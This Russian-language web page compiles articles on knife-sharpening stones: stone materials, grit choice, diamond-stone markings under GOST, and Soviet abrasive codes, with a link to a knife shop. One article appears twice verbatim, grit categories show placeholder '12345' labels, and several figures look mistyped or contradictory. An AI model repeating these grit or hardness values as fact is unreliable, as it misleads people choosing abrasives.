110 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Как определить зернистость точильного бруска

Разновидности точильных брусков и как правильно наточить нож

Нож – незаменимая вещь на кухне. Каждый раз во время готовки требуется что-то нарезать, будь то мясо или овощи. Но часто людям не удается сделать это быстро и ровно из-за затупившегося лезвия. Чтобы такой проблемы не возникало, нужно использовать точильный брусок, он незаменим в каждом доме. С помощью него можно легко поддерживать остроту любого ножа. Тем не менее, все бруски могут существенно различаться по своим характеристикам, поэтому нужно знать, на что обращать внимание при их выборе.

Разновидности

Брусок для заточки представляет собой небольшое изделие вытянутой прямоугольной формы, покрытые абразивным материалом. Абразивность (зернистость) является главным качеством точильных камней, обеспечивающим их высокую твердость. Это позволяет использовать камни для обработки различных материалов, например, металла, кожи, древесины, других минералов. По форме точильные камни бывают прямоугольными, в виде бруска, овальными, в виде круга.

Виды камней, использующихся для заточки ножей очень разнообразны. Каждый из них обладает определенным набором свойств и характеристик, что делает их подходящими к тому или иному типу ножей. Всего существует 5 основных видов материалов для брусков.

Алмазный

Их поверхность покрыта микроскопическими кристаллами, похожими по структуре на алмазную крошку. Такой материал создан искусственно и может иметь поликристаллическую или монокристаллическую структуру. Данный вид брусков имеет много достоинств:

  • Алмазная заточка быстро придаст лезвию отличную остроту;
  • Такой камень не требует смазки при заточке, можно просто смочить его водой;
  • Мало кто затачивал алмазные камни до конца – они отличаются своей долговечностью и прочностью;
  • Материал не засоряется при работе металлической стружкой, после заточки достаточно промыть брусок и протереть тряпкой.

Есть у алмазного бруска для заточки ножей и недостатки:

  • Свойство быстро натачивать нож на максимальную остроту может навредить лезвию, если заточку делает неподготовленный человек;
  • Стоимость их обычно дороже, чем у других видов точильных камней, что часто является решающим пунктом при выборе – минимальная цена равна 800 рублям.

Используют такие камни, в основном, для заточки больших ножей или таких инструментов, как топоры и пилы. При заточке рекомендуется периодически смачивать поверхность. Стоит избегать слишком сильного нажима, иначе это приведет к повреждению лезвия.

Существует два вида алмазных камней, отличающихся нанесением напыления на брусок:

  • Гальваническая связка, при которой кристаллы никеля наносятся на рабочую поверхность, смазанную специальным клеем. Камни с таким напылением способны быстро и качественно заточить лезвие. Такой двухсторонний брусок плох тем, что покрытие не обновляется, постепенно стачиваясь до основания. При работе на лезвии также могут остаться царапины;
  • Органическая связка – в них используются кристаллы алмаза, что несущественно снижает скорость заточки, но и оберегает нож от царапин. Слой связки сплошной, что позволяет стачивать камень до последнего кусочка.

Керамический

Керамические камни для заточки используются довольно часто, основными их производителями являются Китай, Польша и Германия. Состоят они из смеси электрокорунда и карбида кремния, связанных между собой специальным веществом. Их главное преимущество – долговечность. Имея среднюю или мелкую зернистость, они крайне долго изнашиваются. Такие бруски прослужат продолжительное время.

Недостаток керамики – сильная засоряемость рабочей поверхности металлической крошкой, образующейся при заточке. Из-за этого свойства бруски из керамики чаще применяют для удаления царапин после обработки более сильными материалами, такими, как алмазный камень. Применяя керамический брусок, нужно использовать смазочный материал, например раствор с чистящим средством или мылом. Они также обладают сравнительно низкой ценой, можно найти варианты от 400-500 рублей.

Из Арканзасского камня

Материал камня в природе встречается редко – большинство месторождений находится в Америке, штате Арканзас. В связи с большой затратностью добычи этого камня, его стоимость начинается от нескольких тысяч рублей. Точильные камни из Арканзасского камня имеют мелко-кристаллическую структуру. Состоят они из природного спрессованного кварца, что придает им высокую абразивность. Различают камни 4 типов:

  • Мягкий;
  • Твердый белый;
  • Твердый черный;
  • Твердый прозрачный.

Такой точильный камень в виде бруска способен снимать очень тонкий металлический слой с лезвия, что обеспечивает качественную, долговечную заточку. Используют брусок для правки ножей и различных инструментов. При работе с камнем рекомендуется применять специальную смазку или масло, иначе произойдет засорение рабочей поверхности. Очистить ее потом будет крайне затруднительно.

Из Японского водного камня

Материал для них добывается в месторождениях Японии, которые в последнее время существенно истощили свои запасы. Подобные водные камни для заточки ножей еще носят название “оселок”. Они имеют мелкозернистую структуру. По зернистости они схожи с брусками из Арканзасского камня, но обладают большей мягкостью. В Японии такой брусок издревле применялся для правки ножей и традиционного оружия: танто, катан и самурайских мечей. Стоимость на качественные изделия может доходить до значительных сумм в несколько тысяч.

Приступая к работе, рекомендуется вымочить камень в воде в течение двадцати минут. Это очистит поры в нем от грязи и восстановит абразивную поверхность. Если при заточке будут использоваться несколько брусков с разной абразивностью, то для каждого нужна отдельная емкость с водой. Это позволит избежать засорения мелкопористой поверхности одного камня частичками другого, более крупного.

Огромный плюс точильного камня в виде бруска из этого материала заключается в способности восстанавливать лезвие с любой степенью поврежденности. Единственным недостатком является быстрое изнашивание поверхности. Для возвращения первоначального вида профессионалы производят стачивание камня о твердую наждачную бумагу.

Искусственные бруски

Не менее распространенным видом являются и бруски из искусственных материалов вроде корунда, карбида, кремния и оксида хрома. Это лучшие точильные камни для ножей. Поверхность их покрыта кристаллами, которые обладают прочностью выше стали, что позволяет срезать тонкий слой металла при работе. В качестве держащего материала применяют специальную основу, материал которой по мягкости уступает стали и нанесенным на нее кристаллам. Такое свойство позволяет отработанным кристаллам отпадать от основания, что способствует возобновлению рабочей поверхности.

Искусственные бруски не уступают по качеству натуральным изделиям, что делает их хорошей альтернативой по достаточно низкой цене – от нескольких сотен рублей. Данный вид камней широко распространен по всему миру.

Выбор зернистости

Зернистость точильных камней (абразивность) представляет собой количество и размер частиц, из которых состоит тот или иной вид бруска для заточки. При большой зернистости точильные камни будет быстрее и грубее стирать металлический слой с лезвия, он легко может оставить царапины и заусенцы. Такие бруски применяют для изменения формы лезвия или быстрой первичной его обработке, что позволяет убрать с испорченной поверхности большие сколы и царапины. В дальнейшем в заточке можно будет использовать более абразивный, мягкий брусок. Мягкие точильные камни применяют для финальной обработки лезвия, чтобы убрать царапины и потертости – отполировать его до зеркального блеска.

Лучше всего иметь большой набор камней различной зернистости. Это позволит подобрать в каждом конкретном случае оптимальный вариант. Для заточки ножей рекомендуется использовать несколько видов абразива, начиная с более жестких и постепенно переходя на мягкие. Так как обычный кухонный нож каждый день взаимодействует с керамикой тарелок и другими твердыми материалами, смысла использовать сразу мягкие камни нет. Лучше всего подойдут твердый Арканзасский вид брусков или твердые искусственные точильные бруски, которые придают затачиваемому ножу характерный блеск. Для ножниц используют чуть более жесткие виды, так как это позволяет избежать попадания в металл слишком большого количества частиц от мягких камней.

Если начать точить нож слишком мягким материалом, то острота ножа будет крайне хрупкой – нож затупится довольно быстро. Слишком твердые абразивы тоже не стоит брать, так как они оставят много царапин и сколов на лезвии.

Как же более точно определить зернистость точильного камня? Для этого существует специальные таблицы зернистости, в которых указаны ее коэффициенты в зависимости от материалов. Таблица для точильных камней, позволяет определить, какая зернистость нужна для каждого вида ножей.

Алмазные бруски: как выбрать, как точить?

— Чем ножи точишь?
— У меня алмазные бруски!
— А-а, не знаешь, наверное, что не для каждого ножа они подходят…

(Из разговора с кузнецом)

Быстро поправить заточку ножа на охоте или рыбалке, или вывести режущую кромку на вновь изготовленном или напрочь загубленном ноже – с помощью алмазного бруска ты сделаешь это легко и просто. Лишь два условия…

  • Ты правильно выбрал алмазный брусок под свои задачи.
  • И освоил начальную технику правки и заточки на алмазах.

Об этом и поговорим. В статье не будет никаких сложных терминов и понятий, например, «осаждение алмазного абразивного порошка на стальной поверхности бруска с помощью эпоксидного компаунда» или «удержание алмазов с помощью электролитически осаженного никеля»)). Нет, я не про это сегодня.

Задача данного материала научить выбирать алмазный брусок под свои потребности и пользоваться им в случае возникшей необходимости.

А чтобы придать нашей беседе легкость, посмотри шуточное видео, которое мы специально сняли для этой цели. Да, это видео именно про алмазные бруски.

ВИДЕО: Алмазные бруски. Главное не увлекаться))

Ну, а теперь продолжим. Что есть «алмазный брусок»? Обычно, это пластмассовая или алюминевая основа, на которой закреплены две металлические пластины, на которые с помощью химических методов посажены и удерживаются абразивные алмазные зерна.

Рис. 1 Структура алмазного двухстороннего бруска для заточки и правки ножей

Огромное достоинство алмазных брусков заключается в том, что даже «бывалый» брусок, видавший не один десяток ножей остается абсолютно плоским. «Какие еще достоинства у этих брусков?», – спросишь ты.

Алмазные бруски: достоинства

  • Зерна алмазного абразива имеют более острые грани по сравнению с другими абразивами и не изменяют своей формы в процессе работы.
  • Алмазные бруски не хрупкие, от удара они не расколются, как, например, природные или искусственные камни для заточки.
  • Заточка на алмазных брусках не требует специального масла – достаточно слегка увлажнить его водой.
  • Алмазный брусок не засорится при заточке частичками обрабатываемой стали ножа. Для очистки бруска достаточно прополоскать его в воде и протереть насухо ветошью или фиброй.
  • Алмазные бруски стачивают сталь очень быстро. Это позволяет сохранить рабочую поверхность (длину) бруска более длительное время по сравнению с керамикой или природным абразивом.

Но не спеши бежать в магазин или сёрфить в интернете по части покупки алмазного бруска. У этих брусков есть два недостатка, которые для тебя, возможно, важны:

Алмазные бруски: недостатки

  • Эффективное стачивание стали ножа в процессе заточки на алмазных брусках, в неумелых руках может привести к неисправимому повреждению лезвия.
  • И второй недостаток — это «цена». Да, алмазные бруски несколько дороговаты по сравнению с природными абразивами, так как технология производства хороших (читай фирменных, марочных) алмазных брусков довольно дорога. И цены начинаются, как правило, от 800 рублей (02.11.2016 г.). Видел дешевле? Обходи такой брусок стороной! Через 5-10 заточек он будет лысый – придется выбросить, а ты ведь этого не хочешь?

Руки твои мы сейчас поправим)) – об этом ниже. А второй недостаток «цена» исправить более проблематично. Тут уж все в твоих руках. Извини за каламбур.

Алмазные бруски: обозначение и маркировка

Но сначала научимся выбирать алмазный брусок. Видел их обозначение? Смотри: 2500/2000, 2000/1600, 1600/1250, 1250/1000, 1000/80, 800/630, 630/500, 500/400, 400/351, 315/250, 250/200, 200/160, 160/125 , 125/100, 100/80, 80/63, 63/50, 50/40 , 40/28, 28/20, 20/14, 14/10 , 10/7, 7/5, 5/3, 1/0 .

Растерялся? На самом деле ничего сложного. Обозначения эти приняты по ГОСТ 9206-81 (алмазы) и делятся на:

  • 12345 — Алмазные бруски для ремонтных работ связанные с интенсивным съемом металла, а именно, восстановление и изменение формы и профиля клинка и режущей кромки.
  • 12345 — Алмазные бруски для удаления следов обдирочных операций, шлифовке и основных работ по заточке, а именно получение заданных параметров клинка и режущей кромки.
  • 12345 — Алмазные бруски для удаления шлифовки поверхности клинка, чистовая заточка и доводка режущего инструмента.
  • 12345 — Алмазные бруски для правки режущих кромок, полировки поверхности.

Уже легче? А маркировка расшифровывается так, например, «125/100» означает, что на данной стороне бруска присутствуют алмазные зерна минимум 100, максимум 125 микрон.

Обычно на брусках (на обеих сторонах) производитель ставит клеймо, которое указывает на его зернистость. Вот такое:

Рис. 2 Маркировка алмазного бруска

Учитывая, что речь идет про двухсторонние алмазные бруски, то сам понимаешь, что одна сторона предназначена для более грубых операций по заточке, другая для правки и полировки режущей кромки.

«Круто! Один алмазный брусок для двух операций!» — воскликнешь ты.

Да, так и есть, «два в одном». Как правило, зеленоватая сторона бруска грубее, а коричневая – тоньше. Если маркировки нет, можно ощутить это тактильно ногтем, либо взять лупу и ощутить это уже визуально.

Универсальный алмазный брусок

А теперь, послушай совет бывалых. Алмазный брусок у которого одна сторона маркирована значением «100/80», а вторая «50/40» перекрывает 99% заточных операций. Поверь, этого бруска будет достаточно!

Мало опыта в заточных операциях или нет надобности выводить режущую кромку до строгания волоса? Покупай именно этот брусок! Он всегда будет с тобой. Клади его в рюкзак при выходе «на природу», бери его с собой на охоту и рыбалку – универсальный алмазный брусок придаст остроту твоему ножу в процессе работы по разделке туши кабана, богатого улова или при нарезке продуктов на кухне.

Изготавливаешь ножи самостоятельно? Или затачивать ножи твоё хобби? Пользуйся нашей «Таблицей абразивов» чтобы подобрать алмазные или другие бруски под свои потребности.

Рис. 3 Таблица абразивов поможет ориентироваться тебе при выборе заточного материала под свои потребности

Скачай её с большим разрешением по этой ссылке.

Как точить на алмазных брусках?

C выбором алмазного бруска более-менее разобрались. Если что, то пиши мне на почту. Помогу советом. Приступим к «правке рук», а именно грамотной заточке на алмазных брусках. Правила здесь просты и неукоснительны. Перечислю сразу все:

    • Перед заточкой смочи алмазный брусок водой. Можно капнуть на брусок каплю моющего средства, например, Fairy (не реклама).
    • В процессе заточки, через каждые 15-20 движений смывай образовавшуюся эмульсию с бруска под струёй воды и продолжай.
    • Устал? Решил перекурить? Положи на время брусок в тазик с водой.
    • Когда правишь нож, то не держи брусок в руках. Лучше положи его на деревянную дощечку с небольшим упором, чтобы брусок не скользил по ней.
    • Допускается держать брусок в руке при правке ножа в походных условиях. Но береги пальцы! Даже если твой нож затупился, он все еще сможет нанести тебе сильные порезы на пальцах.
    • При заточке старайся использовать всю поверхность бруска, а не точить нож по одному краю или по середине бруска. В этом случае алмазный слой на бруске будет стачиваться равномерно.
    • Не нужно сильно нажимать на нож в процессе заточки – это, пожалуй, самое главное правило! При сильном нажиме ты будешь выламывать кристаллики абразива из поверхности камня, что есть не очень хорошо. И можно просто загубить дорогой алмазный брусок.
    • Последнее правило наиболее актуально для нового (вновь приобретенного) алмазного бруска, который тебе сначала предстоит «обкатать» или притереть.
  • Запомни, что новый алмазный брусок поначалу снимает сталь более агрессивно, но начинает терять эту агрессивность с каждым заточенным ножом. Это нормальное явление. После заточки 5-10 ножей алмазный брусок дойдет до своей расчетной кондиции и будет служить, и радовать тебя долгие годы.

А теперь приступим к практике. Не буду рассказывать про то как выводить режущую кромку изначально, на только что изготовленном ноже. Про это много написано на различных ножевых формах. И есть специальные приспособления. Но если ты пришел к этому, то скорее всего уже разбираешься в заточке на алмазных и других камнях.

А если лишь осваиваешь азы, то видео, о том, как поправить заточку ножа на алмазном бруске, будет для тебя кстати. Смотри:

ВИДЕО: Правка ножа на алмазном бруске

Где купить алмазные двухсторонние бруски?

Понравилась статья? Почерпнул из неё что-нибудь полезное?

Переходим к покупке! Вот ссылка на раздел интернет-магазина, где продаются алмазные бруски. И не просто бруски, а алмазные бруски хорошего качества (марочные, фирменные) и российского производителя. Все они проверены не только нами, но и сотнями покупателей, которые ни разу не высказали о них негативного мнения. Почитай отзывы на страницах этих товаров:

Алмазные бруски в интернет-магазине Златоустовские ножи

P.S. Заметил что алмазные бруски двух размеров? 200х35х10 и 120х35х10. Лично рекомендую взять размер побольше. Почему? Просто удобнее точить! Бруски небольшого размера удобнее брать с собой в поход или на охоту из-за небольшого веса и размеров. А если точишь дома, то на большом бруске делать это более комфортно.

P.S.S. Помнишь выдержку из разговора с кузнецом в начале статьи? Так вот, знающие люди не рекомендуют применять алмазные бруски для заточки и правки ножей из литого булата.

Связано это с тем, что … (скоро напишу).

Ножи из других сталей смело точи на алмазах! Удачи!

Алмазные бруски: как выбрать, как точить?

— Чем ножи точишь?
— У меня алмазные бруски!
— А-а, не знаешь, наверное, что не для каждого ножа они подходят…

(Из разговора с кузнецом)

Быстро поправить заточку ножа на охоте или рыбалке, или вывести режущую кромку на вновь изготовленном или напрочь загубленном ноже – с помощью алмазного бруска ты сделаешь это легко и просто. Лишь два условия…

  • Ты правильно выбрал алмазный брусок под свои задачи.
  • И освоил начальную технику правки и заточки на алмазах.

Об этом и поговорим. В статье не будет никаких сложных терминов и понятий, например, «осаждение алмазного абразивного порошка на стальной поверхности бруска с помощью эпоксидного компаунда» или «удержание алмазов с помощью электролитически осаженного никеля»)). Нет, я не про это сегодня.

Задача данного материала научить выбирать алмазный брусок под свои потребности и пользоваться им в случае возникшей необходимости.

А чтобы придать нашей беседе легкость, посмотри шуточное видео, которое мы специально сняли для этой цели. Да, это видео именно про алмазные бруски.

ВИДЕО: Алмазные бруски. Главное не увлекаться))

Ну, а теперь продолжим. Что есть «алмазный брусок»? Обычно, это пластмассовая или алюминевая основа, на которой закреплены две металлические пластины, на которые с помощью химических методов посажены и удерживаются абразивные алмазные зерна.

Рис. 1 Структура алмазного двухстороннего бруска для заточки и правки ножей

Огромное достоинство алмазных брусков заключается в том, что даже «бывалый» брусок, видавший не один десяток ножей остается абсолютно плоским. «Какие еще достоинства у этих брусков?», – спросишь ты.

Алмазные бруски: достоинства

  • Зерна алмазного абразива имеют более острые грани по сравнению с другими абразивами и не изменяют своей формы в процессе работы.
  • Алмазные бруски не хрупкие, от удара они не расколются, как, например, природные или искусственные камни для заточки.
  • Заточка на алмазных брусках не требует специального масла – достаточно слегка увлажнить его водой.
  • Алмазный брусок не засорится при заточке частичками обрабатываемой стали ножа. Для очистки бруска достаточно прополоскать его в воде и протереть насухо ветошью или фиброй.
  • Алмазные бруски стачивают сталь очень быстро. Это позволяет сохранить рабочую поверхность (длину) бруска более длительное время по сравнению с керамикой или природным абразивом.

Но не спеши бежать в магазин или сёрфить в интернете по части покупки алмазного бруска. У этих брусков есть два недостатка, которые для тебя, возможно, важны:

Алмазные бруски: недостатки

  • Эффективное стачивание стали ножа в процессе заточки на алмазных брусках, в неумелых руках может привести к неисправимому повреждению лезвия.
  • И второй недостаток — это «цена». Да, алмазные бруски несколько дороговаты по сравнению с природными абразивами, так как технология производства хороших (читай фирменных, марочных) алмазных брусков довольно дорога. И цены начинаются, как правило, от 800 рублей (02.11.2016 г.). Видел дешевле? Обходи такой брусок стороной! Через 5-10 заточек он будет лысый – придется выбросить, а ты ведь этого не хочешь?

Руки твои мы сейчас поправим)) – об этом ниже. А второй недостаток «цена» исправить более проблематично. Тут уж все в твоих руках. Извини за каламбур.

Алмазные бруски: обозначение и маркировка

Но сначала научимся выбирать алмазный брусок. Видел их обозначение? Смотри: 2500/2000, 2000/1600, 1600/1250, 1250/1000, 1000/80, 800/630, 630/500, 500/400, 400/351, 315/250, 250/200, 200/160, 160/125 , 125/100, 100/80, 80/63, 63/50, 50/40 , 40/28, 28/20, 20/14, 14/10 , 10/7, 7/5, 5/3, 1/0 .

Растерялся? На самом деле ничего сложного. Обозначения эти приняты по ГОСТ 9206-81 (алмазы) и делятся на:

  • 12345 — Алмазные бруски для ремонтных работ связанные с интенсивным съемом металла, а именно, восстановление и изменение формы и профиля клинка и режущей кромки.
  • 12345 — Алмазные бруски для удаления следов обдирочных операций, шлифовке и основных работ по заточке, а именно получение заданных параметров клинка и режущей кромки.
  • 12345 — Алмазные бруски для удаления шлифовки поверхности клинка, чистовая заточка и доводка режущего инструмента.
  • 12345 — Алмазные бруски для правки режущих кромок, полировки поверхности.

Уже легче? А маркировка расшифровывается так, например, «125/100» означает, что на данной стороне бруска присутствуют алмазные зерна минимум 100, максимум 125 микрон.

Обычно на брусках (на обеих сторонах) производитель ставит клеймо, которое указывает на его зернистость. Вот такое:

Рис. 2 Маркировка алмазного бруска

Учитывая, что речь идет про двухсторонние алмазные бруски, то сам понимаешь, что одна сторона предназначена для более грубых операций по заточке, другая для правки и полировки режущей кромки.

«Круто! Один алмазный брусок для двух операций!» — воскликнешь ты.

Да, так и есть, «два в одном». Как правило, зеленоватая сторона бруска грубее, а коричневая – тоньше. Если маркировки нет, можно ощутить это тактильно ногтем, либо взять лупу и ощутить это уже визуально.

Универсальный алмазный брусок

А теперь, послушай совет бывалых. Алмазный брусок у которого одна сторона маркирована значением «100/80», а вторая «50/40» перекрывает 99% заточных операций. Поверь, этого бруска будет достаточно!

Мало опыта в заточных операциях или нет надобности выводить режущую кромку до строгания волоса? Покупай именно этот брусок! Он всегда будет с тобой. Клади его в рюкзак при выходе «на природу», бери его с собой на охоту и рыбалку – универсальный алмазный брусок придаст остроту твоему ножу в процессе работы по разделке туши кабана, богатого улова или при нарезке продуктов на кухне.

Изготавливаешь ножи самостоятельно? Или затачивать ножи твоё хобби? Пользуйся нашей «Таблицей абразивов» чтобы подобрать алмазные или другие бруски под свои потребности.

Рис. 3 Таблица абразивов поможет ориентироваться тебе при выборе заточного материала под свои потребности

Скачай её с большим разрешением по этой ссылке.

Как точить на алмазных брусках?

C выбором алмазного бруска более-менее разобрались. Если что, то пиши мне на почту. Помогу советом. Приступим к «правке рук», а именно грамотной заточке на алмазных брусках. Правила здесь просты и неукоснительны. Перечислю сразу все:

    • Перед заточкой смочи алмазный брусок водой. Можно капнуть на брусок каплю моющего средства, например, Fairy (не реклама).
    • В процессе заточки, через каждые 15-20 движений смывай образовавшуюся эмульсию с бруска под струёй воды и продолжай.
    • Устал? Решил перекурить? Положи на время брусок в тазик с водой.
    • Когда правишь нож, то не держи брусок в руках. Лучше положи его на деревянную дощечку с небольшим упором, чтобы брусок не скользил по ней.
    • Допускается держать брусок в руке при правке ножа в походных условиях. Но береги пальцы! Даже если твой нож затупился, он все еще сможет нанести тебе сильные порезы на пальцах.
    • При заточке старайся использовать всю поверхность бруска, а не точить нож по одному краю или по середине бруска. В этом случае алмазный слой на бруске будет стачиваться равномерно.
    • Не нужно сильно нажимать на нож в процессе заточки – это, пожалуй, самое главное правило! При сильном нажиме ты будешь выламывать кристаллики абразива из поверхности камня, что есть не очень хорошо. И можно просто загубить дорогой алмазный брусок.
    • Последнее правило наиболее актуально для нового (вновь приобретенного) алмазного бруска, который тебе сначала предстоит «обкатать» или притереть.
  • Запомни, что новый алмазный брусок поначалу снимает сталь более агрессивно, но начинает терять эту агрессивность с каждым заточенным ножом. Это нормальное явление. После заточки 5-10 ножей алмазный брусок дойдет до своей расчетной кондиции и будет служить, и радовать тебя долгие годы.

А теперь приступим к практике. Не буду рассказывать про то как выводить режущую кромку изначально, на только что изготовленном ноже. Про это много написано на различных ножевых формах. И есть специальные приспособления. Но если ты пришел к этому, то скорее всего уже разбираешься в заточке на алмазных и других камнях.

А если лишь осваиваешь азы, то видео, о том, как поправить заточку ножа на алмазном бруске, будет для тебя кстати. Смотри:

ВИДЕО: Правка ножа на алмазном бруске

Где купить алмазные двухсторонние бруски?

Понравилась статья? Почерпнул из неё что-нибудь полезное?

Переходим к покупке! Вот ссылка на раздел интернет-магазина, где продаются алмазные бруски. И не просто бруски, а алмазные бруски хорошего качества (марочные, фирменные) и российского производителя. Все они проверены не только нами, но и сотнями покупателей, которые ни разу не высказали о них негативного мнения. Почитай отзывы на страницах этих товаров:

Алмазные бруски в интернет-магазине Златоустовские ножи

P.S. Заметил что алмазные бруски двух размеров? 200х35х10 и 120х35х10. Лично рекомендую взять размер побольше. Почему? Просто удобнее точить! Бруски небольшого размера удобнее брать с собой в поход или на охоту из-за небольшого веса и размеров. А если точишь дома, то на большом бруске делать это более комфортно.

P.S.S. Помнишь выдержку из разговора с кузнецом в начале статьи? Так вот, знающие люди не рекомендуют применять алмазные бруски для заточки и правки ножей из литого булата.

Связано это с тем, что … (скоро напишу).

Ножи из других сталей смело точи на алмазах! Удачи!

Зернистость камня для заточки ножей: маркировка, гритность

Точильные камни – многофункциональные инструменты, они нужны для ремонта, правки и заточки приспособлений, которые имеют режущую кромку. Они превосходно справляются с такой задачей, как заточка, так как сила и интенсивность ручной обработки подбираются самостоятельно, в отличие от электрических станков, которые работают на высоких оборотах и из-за небольшой ошибки могут испортить всё изделие. Ещё одним достоинством брусков будут их скромные габариты, благодаря чему любой турист, рыбак или охотник может иметь их при себе.

Но стоит сразу отметить, что даже любительская заточка на камнях – дело далеко не простое. У тех, кто ни разу не пользовался подобными абразивами, могут возникнуть определённые сложности в самом начале пути – выборе «инструмента». Самый часто задаваемый вопрос, который можно услышать от новичка: какая необходима зернистость камня для заточки ножей. Постараемся полностью раскрыть эту тему, разложив всё по полочкам.

Классификации точильных камней

Первые камни для заточки применялись человеком ещё в древности. Например, чтобы восстановить режущие свойства своих кос, крестьяне пользовались специальными брусками, называемыми осёлками.

Более-менее современный вид заточный камень приобрёл во времена СССР, когда на него стали наносится специальные маркировки. Вынужденно это было подгоном всех производимых изделий под общие стандарты.

Бруски того времени имели следующие данные:

  • клеймо производителя;
  • тип изделия;
  • размеры;
  • зернистость;
  • материал изготовления;
  • технические свойства;
  • класс точности;
  • ГОСТ-стандарт.

По своему виду происхождения точильные камни подразделяются на 2 группы:

Натуральные

Являются древнейшими инструментами для заточки. Существует огромное количество минералов, обладающими подобными характеристиками. Их добывают по всему миру.

Одними из самых популярных видов являются японские водные камни и Арканзас.

Синтетические

Достойная, современная замена натуральным абразивам. Технологический прогресс и промышленная революция, предъявившая новые высокие требования к заточке, дала толчок развитию разработки и создания синтетических материалов. Их несомненным плюсом является то, что на заводе могут самостоятельно задать их твёрдость, зернистость и размеры, подогнав всё под ГОСТ. Они изготавливаются из сверхпрочных составов, которые соединяются термальной обработкой. Подобные камни делятся на 3 вида:

Зернистость заточных камней

Самый первый вопрос, ответ на который поможет подобрать правильный камень для ножей, касается как раз зернистости, её ещё называют гритность. От величины данного параметра напрямую зависит агрессивность воздействия на металл.

Крупные зёрна оставляют на поверхности глубокие сколы и выемки, что является недопустимым. Идеальной работой считается ровная, острая, зеркальная режущая кромка без каких-либо дефектов. Именно поэтому крупные зёрна применяются только для работ с заготовками, то есть обрабатывают только что выкованный клинок, или для восстановления. Мелкие зёрна отвечают за шлифовку и конечную полировку. Правда работа с этим камнем занимает на порядок больше времени, но результат того стоит. Средним зерном происходит затачивание, если лезвие слегка затупилось.

В своём комплекте желательно иметь минимум, если вы точите нечасто или только учитесь, три двухсторонних камня: с очень мелким зерном, средним и крупным. Работать стоит, переходя от крупного к мелкому.

Таблица зернистости и шероховатости

В данной таблице собрана вся необходимая информация, которая поможет разобраться с различными видами камней: маркировка, зернистость, шероховатость и назначение.

Заточи Клинок

Сайт о заточке ножей

Справочные данные по советским абразивам

Последовательности нанесения условных знаков маркировки кругов.

Это может быть полезно каждому кто будет покупать абразива не просто так, на глазок, а конкретное изделие.

— код круга по ОКП;
— товарный знак или марка изготовителя;
— типоразмер круга (на кругах c D = 250мм);
— марку шлифматериала;
— зернистость и ее индекс;
— степень твердости;
— номер структуры;
— марку связки (на кругах c D = 50мм);
— рабочую окружную скорость (на кругах c D = 150мм);
— класс неуравновешенности;
— класс точности;
— номер ГОСТ или ОСТ.

Главные параметры бруска (или круга — некоторые в целях экономии точат на обломках от круга) это:

— марка шлифматериала;
— зернистость;
— твердость.

Например 44А 40Н С2 8 К означает: монокорунд 44А; зернистость 40 с нормальным (Н) содержанием основной фракции; твердость С (средняя) 2; повышенной плотности структура 8; керамическая связка К (она может иметь несколько типов — от К1 до К10).

1. Марка шлифматериала : самый твердый — алмазы природные с микротвержостью 8600 — 10000 кгс/кв. мм и эльбор 8000 — 10000 кгс/кв. мм. Природный алмаз имеет условное обозначение А, синтетический — АС, синтетические поликристаллические материалы — АР (АРВ1, АРК4, АРС№) с добавлением условного обозначения типа алмазного поликристалла.
Несколько мягче алмаз синтетический 5300 — 96000 кгс/кв. мм и карбид бора 4000 — 4500 кгс/кв. мм. Далее следует карбид кремния 3300 — 3600 кгс/кв. мм. Зернистость абразива маркируется отдельно, сразу после марки абразива.
Маркировка зернистости алмазных абразивов несколько отличается. Это дробь, у которой числитель соответствует размеру стороны ячеек верхнего сита (мкм) а знаменатель — нижнего сита основной фракции.
Например алмазное шлифзерно и шлифпорошки:
400/250, 400/315, 160/125 — предварительная грубая заточка;
200/100… 125/100 — заточка;
125/100… 80/63 — чистовая заточка;

Алмазные микропорошки:
63/50… 50/40 — доводка;
40/28… 5/3 — окончательная доводка;
1/0 — особо точная доводка.

Помимо бакелитовых (Б, Б1…Б3), самых распространенных, вы можете встретить и вулканитовую (В, В1… В5) — это гибкие абразива типа ведущих кругов. Берите лучше керамическую. Если найдете.

И подробнее по типу абразива.

13А, 14А, 15А — электрокорунд нормальный (Al2O3). Цвет — розовый, коричневый (от светлого до темного). Микротвердость 1900 — 2000 кгс/кв. мм.
23А, 25А — электрокорунд белый. Цвет — бело-розовый и белый. Микротвердость 2000 — 2100 кгс/кв. мм.
33А, 34А — электрокорунд хромистый (технический рубин). Розовый или темновишневый цвет. Микротвердость 2000 — 2200 кгс/кв. мм.
37А — электрокорунд титановый (технический сапфир). Если повезет, берите именно его. Абразива Spyderco — как раз они — электрокорунд с примесями диоксида титана. Микротвердость 2200 — 2300 кгс/кв. мм.
38А — электрокорунд циркониевый. Микротвердость 2300 — 2400 кгс/кв. мм.
ЭС — сферокорунд. Микротвердость 2000 — 2100 кгс/кв. мм.
43А, 44А, 45А — монокорунд — рекомендую для правки. Микротвердость 2300 — 2400 кгс/кв. мм.
53С, 54С, 55С — Карбид кремния черный. Микротвердость 3300 — 3600 кгс/кв. мм.
63С, 64С — Карбид кремния зеленый. Микротвердость 3300 — 3600 кгс/кв. мм.
КБ — карбид бора;
ЛО, ЛП, ЛВМ, ЛПМ — эльбор (кубический нитрид бора).

Карбид кремния очень износостоек, справляется почти с любой сталью (даже высокоуглеродистой). Это для операций значительного съема материала — восстановление убитого профиля, первичная точка совсем тупых лезвий крупным зерном а также полировки и окончательная доводка РК мелким зерном. Более мягкий и однородный — белый электрокорунд — 25А. Это уже чистовые операции. Нормальный электрокорунд — нечто среднее между ними — 13А, 14А. Годится и для точки и для правки — в зависимости от размера зерна. Из него (как из самого дешевого) обычно делают бруски типа «лодочка». Зернистость «лодочек» — от 25 до 10, твердость СМ2 — С2. Лужские получше чем московские, но в принципе все они по умолчанию (как ширпотреб для граждан) никогда качеством не блистали. Рекомендуется брать бруски с маркировкой.

В общем виде для керамических ножей рекомендуют предварительную заточку 63С и 64С зернистостью 25–40, окончательную — 63С и 65С зернистостью 16–25 и доводку 64С и 63С зернистость 5–8.

Для быстрорежущих и высокоуглеродистых коррозионностойких предварительная заточка 23А, 24А, 25А или 43А, 44А, 45А и зернистостью 25 — 40. Заточка окончательная — 25А, 24А, 23А, зернистость 16 — 25. Доводка 64С и 63С зернистость 5–6.

Прочие стали — предварителная заточка 23А, 24А, 25А или 43А, 44А, 45А и зернистостью 25 — 40. Заточка окончательная — 25А, 24А, 23А, зернистость 16 — 25. Доводка 64С и 63С зернистость 5–6.

